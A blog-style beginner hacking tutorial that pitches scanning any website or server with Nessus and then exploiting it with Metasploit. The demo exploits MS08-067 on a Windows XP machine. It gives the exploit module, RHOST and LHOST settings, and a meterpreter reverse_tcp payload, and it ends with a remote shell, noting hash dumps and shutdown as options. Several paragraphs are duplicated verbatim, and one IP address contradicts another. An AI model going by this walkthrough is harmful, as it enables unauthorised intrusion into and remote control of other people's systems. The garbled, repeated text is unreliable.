I will tell you how to find the vulnerability on any website or server using NESSUS and how to exploit it using Metasploit (MSF)
For this purpose i have used two system whom i have connected via WAN, host os does not matter, victim has xp installed on it.
Basic commands to be known:
1.searching anything: "search name"
2.set exploit: "use exploit_name"
3.set payload:"set payload payload_name"
4.see info: "info name"
STEP 1:
First instead of using nmap for port scanning , we have used nessus for the vul scanning, nessus has one more added advantage of giving each vul a number which helps in msf to search the proper exploit.
So, first we will scan the target.
Click Here to View The Image ScreenShot
In the above scan you can see how good nessus is in giving the information about the level of vulnerability. After analysing the report, we see 5 high vulnerability so clicking on the first one, lets see its details:
Click Here To View The Image ScreenShot
We can see lots of info about the vulnerability, vulnerability here service flaw at port 445 which has been given the number of MS08-067, this number is going to be of great help in future.
Click Here to View The Image ScreenShot
In the above scan you can see how good nessus is in giving the information about the level of vulnerability. After analysing the report, we see 5 high vulnerability so clicking on the first one, lets see its details:
Click Here To View The Image ScreenShot
We can see lots of info about the vulnerability, vulnerability here service flaw at port 445 which has been given the number of MS08-067, this number is going to be of great help in future.
STEP2:
In msf, we are going to search for the proper exploit which can exploit it's vulnerability, so to make our search easier we are gonna type search number, wola see what we have got is the exact name of exploit, but for the other cases where you dont know the number or id , then also we can search by giving various parameters like name eg. search name etc...then we have to choose the best one among them by comparing all the requirnments and working.
Click Here To View The Image ScreenShot
Now , since here we have got the exact exploit, then we are going to use this exploit, command used for it:
Click Here To View The Image ScreenShot
Now , since here we have got the exact exploit, then we are going to use this exploit, command used for it:
use exploit name eg. use windows/smb/ms08_067_netapi
we will check the various parameters by typing: info windows/smb/ms08_067_netapi
STEP3:
Now it's time to set victim's ip address i.e.. RHOST , RPORT is already set to 445
command to set RHOST: setg RHOST 192.168.1.5
Note:(192.16.1.5 is the ip address of ma pc on local network whom i am going to attack)
STEP4:
After setting exploit, now its time to set the payload, so the main question arises which payload to use now??
Options for this questions can be shortened by typingshow payloads which gives the list of payloads which are compatible with that exploit.
In that we are going to select any payload , i prefer meterpreter/reverse_tcp.
To use this payload type the command: set payload windows/meterpreter/reverse_tcp
so , i will check it's paramater i.e.. LHOST, LPORT etc, now to check that , we type info windows/meterpreter/reverse_tcp
Now here we have to make some change LHOST, LHOST refers to the ip-address of attacker i.e.. mine.
So to set the LHOST we do : setg LHOST 192.168.1.10
Click Here To View The Image ScreenShot
All done we are now ready to exploit.
Click Here To View The Image ScreenShot
All done we are now ready to exploit.
STEP 5:
Finally we type exploit wola.... attack sucessful, session is created.
Click Here To View The Image ScreenShot
Now, what to do now?? Just type the command help you will get a list of commands like kill process, shutdown,hash dumps, but i like shell because it gives you the full command line control of the system which you can see from the above picture.
Click Here To View The Image ScreenShot
Now, what to do now?? Just type the command help you will get a list of commands like kill process, shutdown,hash dumps, but i like shell because it gives you the full command line control of the system which you can see from the above picture.
NOTE:
1.This tutorial is only for learning purpose, for any illegal use author is not responsible.
2.Any form of use of this tutorial should be done at own risk.
3.This tutorial is not written by me.
Hack Websites & Servers Using Nessus & Metaspoilt: Step by Step Tutorial for Beginners
EmoticonEmoticon